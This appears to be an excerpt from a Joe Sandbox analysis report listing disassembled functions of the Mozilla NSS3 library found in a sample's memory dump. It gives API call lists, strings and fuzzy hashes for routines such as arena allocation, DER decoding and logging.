Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: 5s/
API String ID: 2831689957-340167759
Opcode ID: 8c68919148439c8d867163e35a80f51d3abfa8adf106e9af046d0461488e47c5
Instruction ID: c4f78f9d765b6fe767afaaad9d1c074abf384e59340c20e2c56b905a46a410a7
Opcode Fuzzy Hash: 8c68919148439c8d867163e35a80f51d3abfa8adf106e9af046d0461488e47c5
Instruction Fuzzy Hash: E6517B75A042258FDF40AF78C488369BBF0BF0A318F265569DC489B706EB35E885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE10F30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE10F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE10F84

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CE2F59B,6CF3890C,?), ref: 6CE10FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CE10FC1

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CE10FDB
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE10FEF
PL_FreeArenaPool.NSS3(?), ref: 6CE11001
PL_FinishArenaPool.NSS3(?), ref: 6CE11009

Strings

5s/, xrefs: 6CE10F3F
security, xrefs: 6CE10F5C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security$5s/
API String ID: 2061345354-2291600020
Opcode ID: 7e4b1f46543d2c713484b2fde0641db12ead814fc38efe67b48055d96d65fbfc
Instruction ID: 909af176651c08f61dc6da5f5761254ba9f05f243c6f2f58451942fb8d2d733c
Opcode Fuzzy Hash: 7e4b1f46543d2c713484b2fde0641db12ead814fc38efe67b48055d96d65fbfc
Instruction Fuzzy Hash: A021F5B1904244BBE7109F25DC41EAA77B4EF4465CF248519FC5896B01F732D925CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF20EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CE02357), ref: 6CF20EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CE02357), ref: 6CF20EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF20EE6

Part of subcall function 6CF209D0: PR_Now.NSS3 ref: 6CF20A22
Part of subcall function 6CF209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CF20A35
Part of subcall function 6CF209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CF20A66
Part of subcall function 6CF209D0: PR_GetCurrentThread.NSS3 ref: 6CF20A70
Part of subcall function 6CF209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CF20A9D
Part of subcall function 6CF209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CF20AC8
Part of subcall function 6CF209D0: PR_vsmprintf.NSS3(?,?), ref: 6CF20AE8
Part of subcall function 6CF209D0: EnterCriticalSection.KERNEL32(?), ref: 6CF20B19
Part of subcall function 6CF209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF20B48
Part of subcall function 6CF209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF20C76
Part of subcall function 6CF209D0: PR_LogFlush.NSS3 ref: 6CF20C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF20EFA

Part of subcall function 6CE0AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE0AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F2B

Strings

Aborting, xrefs: 6CF20EB3
Assertion failure: %s, at %s:%d, xrefs: 6CF20ED9, 6CF20EE5, 6CF20F06, 6CF20F0B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: d5dae5ea196f073eb884b72e48f9eff0f038e6e352169f9f71816094dbe8637f
Instruction ID: 4f0642c8ac554c4191131396f72809bb05abffbe765c5414aebbd37cfd2f4f15
Opcode Fuzzy Hash: d5dae5ea196f073eb884b72e48f9eff0f038e6e352169f9f71816094dbe8637f
Instruction Fuzzy Hash: 1CF0A4B6D001147BDF407BA1DC49EAB3E3DDF42664F404024FE2956703DA76E92496B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE14FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CF60148,?,6CE26FEC), ref: 6CE1502A
PR_NewLock.NSS3(00000001,00000000,6CF60148,?,6CE26FEC), ref: 6CE15034
PL_NewHashTable.NSS3(00000000,6CE6FE80,6CE6FD30,6CEBC350,00000000,00000000,00000001,00000000,6CF60148,?,6CE26FEC), ref: 6CE15055
PL_NewHashTable.NSS3(00000000,6CE6FE80,6CE6FD30,6CEBC350,00000000,00000000,?,00000001,00000000,6CF60148,?,6CE26FEC), ref: 6CE1506D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: abb3f35ed5c04408dc0eda3e20b3559e30f3f17c5c65e1034676989326064cff
Instruction ID: 99e670a488a2f1b3c4d9546ad1a18d0542c8ab974341f8f606643fd5840770ca
Opcode Fuzzy Hash: abb3f35ed5c04408dc0eda3e20b3559e30f3f17c5c65e1034676989326064cff
Instruction Fuzzy Hash: EA31A0B6F1A620DBEA629B65A80CB573778EB1371CF224125E91583F40D3B69414CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CDB2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CDB2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CDB3005
memcpy.VCRUNTIME140(?,?,?), ref: 6CDB30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CDB3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDB3178

Strings

%s at line %d of [%.10s], xrefs: 6CDB3171
database corruption, xrefs: 6CDB316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDB3022, 6CDB3156, 6CDB3162, 6CDB318A, 6CDB3196, 6CDB31A2, 6CDB31AE, 6CDB31BA, 6CDB31C6

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 0e087d94ee25bf12afeaaa080aff5a4d7652937f7aeb48f1e3dd144d660ee356
Instruction ID: d19ccfa19291d3e9c73f38104a7161f74762b5fa797617259ed1c4c4a6669add
Opcode Fuzzy Hash: 0e087d94ee25bf12afeaaa080aff5a4d7652937f7aeb48f1e3dd144d660ee356
Instruction Fuzzy Hash: 1BB1C2B0E05215DBCB08CF9DC884AEEB7B2BF48304F14802AE84AB7B55D7759941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE50C90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CE51444,?,00000001,?,00000000,00000000,?,?,6CE51444,?,?,00000000,?,?), ref: 6CE50CB3

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?,?,6CE51444,?), ref: 6CE50DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?,?,6CE51444,?), ref: 6CE50DEC

Part of subcall function 6CE70F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE12AF5,?,?,?,?,?,6CE10A1B,00000000), ref: 6CE70F1A
Part of subcall function 6CE70F10: malloc.MOZGLUE(00000001), ref: 6CE70F30
Part of subcall function 6CE70F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE70F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?), ref: 6CE50DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CE51444,?,00000001,?,00000000), ref: 6CE50E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?), ref: 6CE50E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?,?,6CE51444,?,?,00000000), ref: 6CE50E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CE51444,?,00000001,?,00000000,00000000,?), ref: 6CE50E79

Part of subcall function 6CE61560: TlsGetValue.KERNEL32(00000000,?,6CE30844,?), ref: 6CE6157A
Part of subcall function 6CE61560: EnterCriticalSection.KERNEL32(?,?,?,6CE30844,?), ref: 6CE6158F
Part of subcall function 6CE61560: PR_Unlock.NSS3(?,?,?,?,6CE30844,?), ref: 6CE615B2

Part of subcall function 6CE2B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CE31397,00000000,?,6CE2CF93,5B5F5EC0,00000000,?,6CE31397,?), ref: 6CE2B1CB
Part of subcall function 6CE2B1A0: free.MOZGLUE(5B5F5EC0,?,6CE2CF93,5B5F5EC0,00000000,?,6CE31397,?), ref: 6CE2B1D2

Part of subcall function 6CE289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CE288AE,-00000008), ref: 6CE28A04
Part of subcall function 6CE289E0: EnterCriticalSection.KERNEL32(?), ref: 6CE28A15
Part of subcall function 6CE289E0: memset.VCRUNTIME140(6CE288AE,00000000,00000132), ref: 6CE28A27
Part of subcall function 6CE289E0: PR_Unlock.NSS3(?), ref: 6CE28A35

Strings

5s/, xrefs: 6CE50C9F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID: 5s/
API String ID: 1601681851-340167759
Opcode ID: 2fcb0420edc5cc3d6767b58a0050481e47f84390585310defbf5ac993554396c
Instruction ID: a56afc44755e0d9656842aaf7c36a558e40e24b8b4676e8347aa1f01526f9655
Opcode Fuzzy Hash: 2fcb0420edc5cc3d6767b58a0050481e47f84390585310defbf5ac993554396c
Instruction Fuzzy Hash: 8C5174B6E002105FEB109F64DC81ABB37B8AF4525CF751428FC1997712EB26E925C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE6A470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE6A4A6

Part of subcall function 6CE70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE708B4

PORT_Alloc_Util.NSS3(?), ref: 6CE6A4EC

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6CE6A527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6CE6A56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6CE6A583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CE6A596
free.MOZGLUE(?), ref: 6CE6A5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE6A5B6

Strings

^jl, xrefs: 6CE6A475

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^jl
API String ID: 3906949479-28684813
Opcode ID: a14ee1af8bb07edb5ef444ed6afb0b4a238c8eab31745085ca83cc5bba691011
Instruction ID: 49d2f355803b074341d9c8c65718ea4777e0be0d7ed1490b62f9c9a639ae1ad1
Opcode Fuzzy Hash: a14ee1af8bb07edb5ef444ed6afb0b4a238c8eab31745085ca83cc5bba691011
Instruction Fuzzy Hash: 3D411731E546529FDB10CF5ACC40B9ABBB1AF41308F24C468D96D5BB42E731E919C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE588E0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE588FC

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CE58913

Part of subcall function 6CE70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
Part of subcall function 6CE70FF0: PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016
Part of subcall function 6CE70FF0: PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CF3D864,?), ref: 6CE58947

Part of subcall function 6CE6E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6CE6E245
Part of subcall function 6CE6E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CE6E254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CE5895B
DER_GetInteger_Util.NSS3(?), ref: 6CE58973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE58982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CE589EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CE58A12

Strings

5s/, xrefs: 6CE588F0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID: 5s/
API String ID: 2145430656-340167759
Opcode ID: 387c8ef58ddc2425614942c06aaf42340832a3222f6cbb3111730d89810806e7
Instruction ID: 64ce2dbe9c7d734d90e7e6d20f3029db492106697e0ff2fbcfb6c51e69da9d00
Opcode Fuzzy Hash: 387c8ef58ddc2425614942c06aaf42340832a3222f6cbb3111730d89810806e7
Instruction Fuzzy Hash: 89313AF2AB460052F73046296C417AA32B55B9231CF74173BD95DD7B81FB23C4678293

Uniqueness

Uniqueness Score: -1.00%

Function 6CE9EF30 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CEBA4A1,?,00000000,?,00000001), ref: 6CE9EF6D

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

htonl.WSOCK32(00000000,?,6CEBA4A1,?,00000000,?,00000001), ref: 6CE9EFE4
htonl.WSOCK32(?,00000000,?,6CEBA4A1,?,00000000,?,00000001), ref: 6CE9EFF1
memcpy.VCRUNTIME140(?,?,6CEBA4A1,?,00000000,?,6CEBA4A1,?,00000000,?,00000001), ref: 6CE9F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CEBA4A1,?,00000000,?,00000001), ref: 6CE9F027

Strings

5s/, xrefs: 6CE9EF42
dtls13, xrefs: 6CE9EF33

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13$5s/
API String ID: 242828995-277106704
Opcode ID: 959af26713f741068bc210524c0c0e75986e5d90a0bea9cccb9416497808b9f3
Instruction ID: f58f0812372528bf5ddc5827b55d9fefbbc0ed3d61ba6a2ee034408929e9ea14
Opcode Fuzzy Hash: 959af26713f741068bc210524c0c0e75986e5d90a0bea9cccb9416497808b9f3
Instruction Fuzzy Hash: 0231F071A00611ABC710CF68CC81B9AB7F4BF4934CF25802AED199B751E731E916CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE1AF60 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE1AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CF39500,6CE13F91), ref: 6CE1AFD2

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

DER_GetInteger_Util.NSS3(?), ref: 6CE1B007

Part of subcall function 6CE66A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CE11666,?,6CE1B00C,?), ref: 6CE66AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CE1B02F
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE1B046
PL_FreeArenaPool.NSS3 ref: 6CE1B058
PL_FinishArenaPool.NSS3 ref: 6CE1B060

Strings

5s/, xrefs: 6CE1AF6F
security, xrefs: 6CE1AFB8

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security$5s/
API String ID: 3627567351-2291600020
Opcode ID: a18fbaea14399378e34d4eff684da4a7b1d9a55826d3cec5eb8b893266cd66e9
Instruction ID: a4cd2c3f82df3a5d30963074364e6a330126412e01a42924ee82d4f6b328979f
Opcode Fuzzy Hash: a18fbaea14399378e34d4eff684da4a7b1d9a55826d3cec5eb8b893266cd66e9
Instruction Fuzzy Hash: 5831E7B1808300DFDB208F149844BAA77B4AF4632CF30461DE8B45BF91E7329559C796

Uniqueness

Uniqueness Score: -1.00%

Function 6CE16DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CE17D8F,6CE17D8F,?,?), ref: 6CE16DC8

Part of subcall function 6CE6FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CE6FE08
Part of subcall function 6CE6FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CE6FE1D
Part of subcall function 6CE6FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CE6FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CE17D8F,?,?), ref: 6CE16DD5

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF38FA0,00000000,?,?,?,?,6CE17D8F,?,?), ref: 6CE16DF7

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE16E35

Part of subcall function 6CE6FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CE6FE29
Part of subcall function 6CE6FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CE6FE3D
Part of subcall function 6CE6FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CE6FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE16E4C

Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF38FE0,00000000), ref: 6CE16E82

